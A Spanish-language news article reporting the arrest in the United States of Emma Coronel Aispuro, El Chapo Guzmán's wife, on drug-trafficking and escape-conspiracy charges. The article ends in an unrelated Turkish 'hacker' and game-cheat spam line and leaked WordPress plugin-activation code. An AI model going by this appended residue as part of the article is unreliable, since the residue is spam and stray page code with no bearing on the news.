EE.UU. detiene por narcotráfico a Emma Coronel, la esposa del Chapo


Emma Coronel Aispuro, la esposa del Chapo Guzmán, ha sido detenida en Estados Unidos y acusada de narcotráfico. Las autoridades estadounidenses la quieren juzgar por su supuesta participación en una conspiración para distribuir cocaína, metanfetaminas, heroína y marihuana en el país. En el momento de su detención, el lunes, Emma Coronel se encontraba en el aeropuerto internacional Dulles de Virgina, cerca de Washington.

De 31 años y doble nacionalidad mexicana y estadounidense, la esposa del Chapo debe comparecer este mismo martes ante un tribunal federal por videoconferencia. También se la acusa de conspirar en la escapatoria de una cárcel mexicana que protagonizó su esposo, el jefe del temido cartel de Sinaloa, en 2015.

El rostro de esta exreina de la belleza del estado de Durango se hizo famoso en Estados Unidos entre los años 2018 y 2019 durante el mediático juicio al que fue sometido su esposo, con el que tiene dos hijas gemelas. El proceso concluyó con una condena a cadena perpetua contra el narcotraficante mexicano, pena que cumple en una prisión de alta seguridad del estado de Colorado.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Hacker Blog Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );